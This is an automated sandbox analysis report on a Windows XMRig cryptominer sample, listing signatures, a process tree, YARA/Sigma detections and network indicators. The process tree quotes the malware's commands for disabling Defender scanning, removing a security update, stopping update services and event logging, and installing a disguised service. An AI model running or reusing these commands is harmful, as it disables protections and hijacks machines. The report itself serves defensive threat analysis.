Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1549101
MD5:fb788c569d7b0acf5546340aa85cd0a6
SHA1:dcbf06332153a462e67e27c74929af46a5a83d39
SHA256:d6787107b40d3d9c65b07aea10e10fa14ff04efbb497b6caf5854812d8e7648b
Tags:exeuser-Bitsight
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FB788C569D7B0ACF5546340AA85CD0A6)
    • powershell.exe (PID: 6696 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4500 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 1396 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6476 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5812 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4944 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6696 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6764 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5480 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2504 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6596 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5812 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5652 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 6716 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7032 cmdline: C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6788 cmdline: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6376 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1188 cmdline: C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • updater.exe (PID: 6792 cmdline: C:\ProgramData\Google\Chrome\updater.exe MD5: FB788C569D7B0ACF5546340AA85CD0A6)
    • powershell.exe (PID: 7108 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5432 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6764 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6376 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 1396 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7108 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5000 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6592 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7032 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2368 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5780 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6712 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 2500 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 5904 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7180 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000040.00000002.3074015557.000001AC03840000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000040.00000002.3074015557.000001AC037E9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x37eb98:$a1: mining.set_target
        • 0x370e20:$a2: XMRIG_HOSTNAME
        • 0x373748:$a3: Usage: xmrig [OPTIONS]
        • 0x370df8:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        64.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          64.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION
          64.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          64.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 5480, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6696, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6696, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6716, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto", ProcessId: 6788, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6696, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 6692, ParentProcessName: file.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 6376, ProcessName: sc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-05T10:37:17.785545+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449732TCP
          2024-11-05T10:37:55.685944+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449743TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\Google\Chrome\updater.exeReversingLabs: Detection: 50%
          Multi AV Scanner detection for submitted file
          Source: file.exeReversingLabs: Detection: 50%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: 64.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000040.00000002.3074015557.000001AC03840000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000040.00000002.3074015557.000001AC037E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000040.00000002.3066852301.0000000140001000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Found strings related to Crypto-Mining
          Source: dialer.exeString found in binary or memory: cryptonight-monerov7
          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC64DCE0 FindFirstFileExW,30_2_00000225DC64DCE0
          Source: C:\Windows\System32\winlogon.exeCode function: 30_2_00000225DC6ADCE0 FindFirstFileExW,30_2_00000225DC6ADCE0
          Source: C:\Windows\System32\lsass.exeCode function: 36_2_00000202C0AEDCE0 FindFirstFileExW,36_2_00000202C0AEDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 39_2_000002A66130DCE0 FindFirstFileExW,39_2_000002A66130DCE0
          Source: C:\Windows\System32\dwm.exeCode function: 40_2_000002BAAEDBDCE0 FindFirstFileExW,40_2_000002BAAEDBDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 65_2_0000026A879CDCE0 FindFirstFileExW,65_2_0000026A879CDCE0
          Source: C:\Windows\System32\svchost.exeCode function: 66_2_00000179537ADCE0 FindFirstFileExW,66_2_00000179537ADCE0
          Source: C:\Windows\System32\svchost.exeCode function: 67_2_000002295D56DCE0 FindFirstFileExW,67_2_000002295D56DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 68_2_0000025306E6DCE0 FindFirstFileExW,68_2_0000025306E6DCE0
          Source: C:\Windows\System32\svchost.exeCode function: 69_2_000001845B3ADCE0 FindFirstFileExW,69_2_000001845B3ADCE0
          Source: global trafficTCP traffic: 192.168.2.4:49730 -> 149.102.143.109:20128
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49732
          Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49743
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: gulf.moneroocean.stream
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735657911.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
          Source: lsass.exe, 00000024.00000000.1736576905.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3074948388.00000202C03A0000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000003.2225238357.00000202C0351000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1735962142.00000202C0351000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
          Source: lsass.exe, 00000024.00000000.1737635817.00000202C0402000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.1736576905.00000202C03C5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3075796589.00000202C0400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
          Source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
          Source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
          Source: updater.exe, 00000023.00000003.1763173486.0000015322AF0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
